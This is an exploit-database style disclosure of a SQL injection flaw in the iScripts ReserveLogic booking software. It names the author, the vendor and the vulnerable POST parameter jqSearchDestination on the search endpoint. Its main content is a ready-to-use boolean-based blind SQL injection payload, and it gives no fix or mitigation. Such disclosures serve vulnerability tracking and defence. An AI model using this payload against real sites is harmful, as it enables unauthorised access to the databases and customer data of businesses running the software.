Exploit Title: iScripts ReserveLogic - SQL Injection
Date: 29.03.2019
Exploit Author: Ahmet Ümit BAYRAM
Vendor Homepage: https://www.iscripts.com/reservelogic/
Demo Site: https://www.demo.iscripts.com/reservelogic/demo/
Version: Lastest
Tested on: Kali Linux
CVE: N/A
—– PoC: SQLi —–
Request: http://localhost/[PATH]/search Vulnerable Parameter: jqSearchDestination (POST) Payload: jqSearchDestination=(SELECT (CASE WHEN (8124=8124) THEN 12345 ELSE (SELECT 3029 UNION SELECT 1241) END))